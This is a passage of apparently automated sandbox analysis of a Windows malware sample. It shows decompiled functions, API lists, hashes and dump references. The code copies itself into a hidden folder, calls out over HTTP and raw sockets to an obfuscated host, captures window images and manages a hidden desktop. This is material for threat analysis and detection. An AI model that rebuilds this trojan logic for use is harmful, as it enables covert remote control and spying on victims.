0x00b49286
0x00b49289
0x00b4928e
0x00b49297
0x00b49297
0x00b492a3
0x00b492a9
0x00b492aa
0x00b492b1
0x00b492b8
0x00b492be
0x00b492c3
0x00b492c8
0x00b492d0
0x00b492d2
0x00b492d2
0x00b492d4
0x00b492d7
0x00b492d8
0x00000000

APIs

Part of subcall function 00B4903F: Sleep.KERNEL32(00000064,?,?,?,00000104,00000104), ref: 00B49066

PathFileExistsA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00B49271
PathFileExistsA.SHLWAPI(?), ref: 00B49280
CreateDirectoryA.KERNEL32(?,00000000), ref: 00B4928E
SetFileAttributesA.KERNEL32(?,00000006), ref: 00B49297
CopyFileA.KERNEL32 ref: 00B492A3

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ExistsPath$AttributesCopyCreateDirectorySleep
String ID:
API String ID: 3090365614-0
Opcode ID: 5f76edfbe5864dcc2bf669beb7fc28c6ec11bbcc97b5e7fc00b8f88ff03333ed
Instruction ID: 87fae02b53992c172d314cb267955ef4e2e4681e620564c4cf2c3384d19d5440
Opcode Fuzzy Hash: 5f76edfbe5864dcc2bf669beb7fc28c6ec11bbcc97b5e7fc00b8f88ff03333ed
Instruction Fuzzy Hash: E221F5709042047BEB123BB85D8AAAF7AECDF42740F1004D4F541A3247DE748B05B7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B497E3, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B497E3(void* __ebx, intOrPtr* __ecx, void* __edi, CHAR* __esi, void* __ebp) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v22;
				short _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				void _v44;
				signed int _t21;
				intOrPtr _t25;
				CHAR* _t32;
				intOrPtr _t36;
				intOrPtr* _t38;
				signed int _t40;
				void* _t42;
				intOrPtr _t53;
				intOrPtr* _t54;
				void* _t62;
				signed int _t67;
				signed int _t68;

				_t63 = __esi;
				_t67 =  &_v44;
				_t21 =  *0xb69014; // 0x26ce9e99
				_v8 = _t21 ^ _t67;
				_t38 = __ecx;
				if( *0xb6afb8 == 0) {
					E00B4A313(__ecx, __esi, 0xb6ae90);
					asm("movaps xmm0, [0xb3dde0]");
					_push(0xb6ae90);
					asm("movups [esp+0x18], xmm0");
					_v28 = 0;
					_t32 = E00B42846( &_v44);
					_t63 = 0xb6aeb8;
					wsprintfA(0xb6aeb8, _t32);
					_t67 = _t67 + 0xc;
					_v36 = 0x21362e22;
					_t5 =  &_v36; // 0x21362e22
					_v32 = 0x693c3c2b;
					_v28 = 0x22262727;
					_v24 = 0x2822;
					_v22 = 0;
					 *0xb6afc4 = E00B427F5(_t5);
					 *0xb6afc0 = 0x50;
					 *0xb6afc8 = 0xb6aeb8;
					 *0xb6afbc = 1;
					E00B487BF(_t38, 0xb6afbc, 0xb6ae90, 0xb6aeb8, 0xb6afbc);
					_t53 =  *0xb6afd4; // 0x0
					_t36 =  *0xb6afd8; // 0x0
					 *0xb6afb8 = _t53;
					 *((char*)(_t36 + _t53)) = 0;
				}
				E00B4A313(_t38, _t63, 0xb6ae90);
				_t54 = _t38;
				_t40 = 8;
				memcpy( &_v44, 0xb6afbc, _t40 << 2);
				_t68 = _t67 + 0xc;
				_t62 = 0xb6afbc + _t40 + _t40;
				_v28 = _t38;
				_t14 = _t54 + 1; // 0x1
				_t42 = _t14;
				do {
					_t25 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t25 != 0);
				_push(_t42);
				_v20 = _t54 - _t42 + 1;
				E00B497AB(_t38, _t54 - _t42 + 1);
				_t16 =  &_v40; // 0x21362e22
				_t45 = _t16;
				E00B487BF(_t38, _t16, _t62, 0xb6afbc, 0xb6afbc);
				E00B497AB(_v16, _v12);
				return E00B4AE43(_v8 ^ _t68, _t45);
			}

0x00b497e3
0x00b497e3
0x00b497e6
0x00b497ed
0x00b497fc
0x00b49808
0x00b4980f
0x00b49814
0x00b4981f
0x00b49820
0x00b49825
0x00b4982a
0x00b49830
0x00b49836
0x00b4983c
0x00b4983f
0x00b49847
0x00b4984b
0x00b49853
0x00b4985b
0x00b49862
0x00b4986e
0x00b49873
0x00b4987d
0x00b49883
0x00b4988d
0x00b49892
0x00b49898
0x00b4989d
0x00b498a3
0x00b498a3
0x00b498a8
0x00b498af
0x00b498b5
0x00b498b8
0x00b498b8
0x00b498b8
0x00b498ba
0x00b498be
0x00b498be
0x00b498c1
0x00b498c1
0x00b498c3
0x00b498c4
0x00b498cb
0x00b498ce
0x00b498d2
0x00b498d8
0x00b498d8
0x00b498dc
0x00b498ea
0x00b49906

APIs

Part of subcall function 00B4A313: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?,?,76D681D0), ref: 00B4A37A
Part of subcall function 00B4A313: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00B4A3D2
Part of subcall function 00B4A313: wsprintfA.USER32 ref: 00B4A448
Part of subcall function 00B4A313: CharUpperBuffA.USER32(?,00000017), ref: 00B4A454
Part of subcall function 00B4A313: RegCloseKey.ADVAPI32(?), ref: 00B4A460

wsprintfA.USER32 ref: 00B49836

Part of subcall function 00B487BF: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B487DF
Part of subcall function 00B487BF: InternetConnectA.WININET(00000000,00000000,?,?,00000050,00000000,00000000,00000003), ref: 00B48831
Part of subcall function 00B487BF: HttpOpenRequestA.WININET(?,00160407,00000000,00000000,00000000,00000000,84680100,00000000), ref: 00B48892
Part of subcall function 00B487BF: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B488AD
Part of subcall function 00B487BF: HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00B488D9

Strings

+<<i, xrefs: 00B4984B
"(, xrefs: 00B4985B
".6!, xrefs: 00B49847
''&", xrefs: 00B49853

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpOpen$InternetQueryRequestwsprintf$BuffCharCloseConnectInfoSendUpperValue
String ID: "($".6!$''&"$+<<i
API String ID: 574757977-275990164
Opcode ID: 721d5bd39dc2b1ea4acbe8e61ee9754206f12c3328f24026a7678f674cdd866d
Instruction ID: bee3d369e75fd5e682c3d05219aed4b6d96cae21d9a226a3ff1f9d6d51af1734
Opcode Fuzzy Hash: 721d5bd39dc2b1ea4acbe8e61ee9754206f12c3328f24026a7678f674cdd866d
Instruction Fuzzy Hash: B631C2715083408BC709EF18E881A6BBBE4BFD9304F1005ADF085A72A1DFB95A499F97

Uniqueness

Uniqueness Score: -1.00%

Function 00B446F7, Relevance: 7.6, APIs: 5, Instructions: 56networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00B44718
socket.WS2_32(00000002,00000001,00000000), ref: 00B44729
gethostbyname.WS2_32(00B6AD28), ref: 00B4473B
htons.WS2_32(00000000), ref: 00B44763
connect.WS2_32(00000000,?,00000010), ref: 00B44774

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Startupconnectgethostbynamehtonssocket
String ID:
API String ID: 2405761414-0
Opcode ID: 8075c3282897f6da66db18d4fb98ab2ab041422036f638202498ac6003f75a12
Instruction ID: 1858e33476ed41492c10984bef6c5aefc3633d04af1420df17d2c72d6ec65505
Opcode Fuzzy Hash: 8075c3282897f6da66db18d4fb98ab2ab041422036f638202498ac6003f75a12
Instruction Fuzzy Hash: 7411A030640218AFDB109BA99C49EBE77FCEF06715B0101A9F911E71E0DFB88A019B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B44383, Relevance: 7.6, APIs: 5, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B44383(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, intOrPtr* _a8) {
				signed int _v8;
				struct _OSVERSIONINFOA _v156;
				void* __ebp;
				signed int _t10;
				intOrPtr* _t34;
				struct HWND__* _t36;
				signed int _t37;

				_t10 =  *0xb69014; // 0x26ce9e99
				_v8 = _t10 ^ _t37;
				_t36 = _a4;
				_t34 = _a8;
				if(IsWindowVisible(_t36) != 0) {
					E00B442A8(__ebx, _t36,  *_t34, _t34, _t36, _t37,  *((intOrPtr*)(_t34 + 4)));
					SetWindowLongA(_t36, 0xfffffff0, GetWindowLongA(_t36, 0xfffffff0));
					E00B4D0F0(_t34,  &(_v156.dwMajorVersion), 0, 0x90);
					_v156.dwOSVersionInfoSize = 0x94;
					GetVersionExA( &_v156);
					if(_v156.dwMajorVersion < 6 && GetTopWindow(_t36) != 0) {
						E00B4435D(_t34, _t23);
					}
				}
				return E00B4AE43(_v8 ^ _t37);
			}

0x00b4438c
0x00b44393
0x00b44397
0x00b4439b
0x00b443a7
0x00b443b0
0x00b443c3
0x00b443d7
0x00b443df
0x00b443f0
0x00b443fd
0x00b4440e
0x00b4440e
0x00b443fd
0x00b44423

APIs

IsWindowVisible.USER32 ref: 00B4439F

Part of subcall function 00B442A8: GetWindowRect.USER32 ref: 00B442CE
Part of subcall function 00B442A8: CreateCompatibleDC.GDI32 ref: 00B442D5
Part of subcall function 00B442A8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00B442F0
Part of subcall function 00B442A8: SelectObject.GDI32(00000000,00000000), ref: 00B442FA
Part of subcall function 00B442A8: PrintWindow.USER32(?,00000000,00000000,?,?,?,?,?,?,?,?,00B443B5,?), ref: 00B44303
Part of subcall function 00B442A8: BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 00B44333
Part of subcall function 00B442A8: DeleteObject.GDI32(00000000), ref: 00B4433B
Part of subcall function 00B442A8: DeleteDC.GDI32(00000000), ref: 00B44342

GetWindowLongA.USER32 ref: 00B443B9
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00B443C3
GetVersionExA.KERNEL32(00000094), ref: 00B443F0
GetTopWindow.USER32(?), ref: 00B44400

Part of subcall function 00B4435D: GetWindow.USER32(00000000,00000001), ref: 00B44374

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CompatibleCreateDeleteLongObject$BitmapPrintRectSelectVersionVisible
String ID:
API String ID: 567582119-0
Opcode ID: efaa1f65b7e98d824463ec5ceab4dcb05c586af460e759dec87187c826efbba2
Instruction ID: e9f508f20b6ce60c71724e4c930c25f2f9b69786306b8129f59408204bcc5081
Opcode Fuzzy Hash: efaa1f65b7e98d824463ec5ceab4dcb05c586af460e759dec87187c826efbba2
Instruction Fuzzy Hash: 6811A131644114ABDB10AF70DC0AFAE73E8AF4A314F1041A4F515E72D1DF78AB069BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B726, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5B726(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xb690c0; // 0xb69114
					if(_t23 != 0) {
						E00B564B8(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xb690c4; // 0xb6a6b4
					if(_t24 != 0) {
						E00B564B8(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xb690c8; // 0xb6a6b4
					if(_t25 != 0) {
						E00B564B8(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xb690f0; // 0xb69118
					if(_t26 != 0) {
						E00B564B8(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xb690f4; // 0xb6a6b8
					if(_t27 != 0) {
						return E00B564B8(_t6);
					}
				}
				return _t6;
			}

0x00b5b72c
0x00b5b731
0x00b5b735
0x00b5b73b
0x00b5b73e
0x00b5b743
0x00b5b747
0x00b5b74d
0x00b5b750
0x00b5b755
0x00b5b759
0x00b5b75f
0x00b5b762
0x00b5b767
0x00b5b76b
0x00b5b771
0x00b5b774
0x00b5b779
0x00b5b77a
0x00b5b77d
0x00b5b783
0x00000000
0x00b5b78b
0x00b5b783
0x00b5b78e

APIs

_free.LIBCMT ref: 00B5B73E

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B5B750
_free.LIBCMT ref: 00B5B762
_free.LIBCMT ref: 00B5B774
_free.LIBCMT ref: 00B5B786

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2b3b464ed62ed08cafdaa8f9629addf0e616b324b43bf118a466de1e2794e60c
Instruction ID: 3f7b2c9c1c4f4b915bdd2fc6e804394ef9ea69c38824daf1b8ee18fcac5c7795
Opcode Fuzzy Hash: 2b3b464ed62ed08cafdaa8f9629addf0e616b324b43bf118a466de1e2794e60c
Instruction Fuzzy Hash: 38F09632504604EB8A60FB64E9C5E1677EDFA44312BD448C5FD18D7790CF78FC848664

Uniqueness

Uniqueness Score: -1.00%

Function 00B462A9, Relevance: 7.5, APIs: 5, Instructions: 22
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B462A9() {
				int _t4;

				TerminateThread( *0xb6ae34, 0);
				TerminateThread( *0xb6ae30, 0);
				CloseDesktop( *0xb6ae3c);
				_t4 = CloseHandle( *0xb6ae34);
				 *0xb6ae74 = 0;
				 *0xb6ae88 = 0;
				 *0xb6ae80 = 0;
				 *0xb6ae8c = 0;
				__imp__#3( *0xb6ae40);
				 *0xb6ae3c = 0;
				 *0xb6ae40 = 0;
				return _t4;
			}

0x00b462b3
0x00b462c0
0x00b462cc
0x00b462d8
0x00b462e4
0x00b462ea
0x00b462f0
0x00b462f6
0x00b462fc
0x00b46302
0x00b46308
0x00b4630f

APIs

TerminateThread.KERNEL32(00000000,00000000,00B46157), ref: 00B462B3
TerminateThread.KERNEL32(00000000), ref: 00B462C0
CloseDesktop.USER32 ref: 00B462CC
CloseHandle.KERNEL32 ref: 00B462D8
closesocket.WS2_32 ref: 00B462FC

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseTerminateThread$DesktopHandleclosesocket
String ID:
API String ID: 2795373509-0
Opcode ID: 8678b6c7e5f2a640474e40dcf1eed9ef35a343043ffea431206172c91ccdce33
Instruction ID: 35bb80e3040f776a715460066df63782ee0194cb42af489eb6dc13ec2ab240c9
Opcode Fuzzy Hash: 8678b6c7e5f2a640474e40dcf1eed9ef35a343043ffea431206172c91ccdce33
Instruction Fuzzy Hash: E1F019765592009BCB126F56FD09805BFBAFBE6706320412AE501A32B0CFFF9851EF12

Uniqueness

Uniqueness Score: -1.00%

Function 00B599F3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00B599F3(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t305;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				signed int _t314;
				void* _t315;
				void* _t316;

				_t131 = _a8;
				_t312 = _t311 - 0x28;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E00B533DE(_t136, _t272, _v8, 1);
						_t313 = _t312 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E00B63587(_t234, _v28 - _t234 + _v8, _v24);
									_t313 = _t313 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E00B52919();
										asm("int3");
										_t309 = _t313;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E00B598AF(_t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E00B63587(_t302 + _t287, _t226, _v0);
												_t314 = _t313 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E00B59F2C(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t305 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E00B564B8(_t302);
														_t305 = _v12;
													}
													E00B564B8(0);
													_t210 = _t305;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E00B63587(_t302, _t226, _a4);
												_t314 = _t313 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00B52919();
													asm("int3");
													_push(_t309);
													_t310 = _t314;
													_t315 = _t314 - 0x298;
													_t166 =  *0xb69014; // 0x26ce9e99
													_v124 = _t166 ^ _t310;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E00B635E0(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E00B55F7B(_t245 - _t289 + 1, _t289,  &_v676, E00B56E67(__eflags));
														_t316 = _t315 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E00B59924( &(_v608.cFileName),  &_v640,  &_v609, E00B56E67(__eflags));
																_t316 = _t316 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t316 = _t316 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E00B564B8(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t303);
																goto L77;
																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E00B564B8(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E00B63090(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E00B5990C);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E00B564B8(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t310;
													return E00B4AE43(_v16 ^ _t310);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E00B564B8(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E00B635A0(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t312 = _t312 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t312 = _t312 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
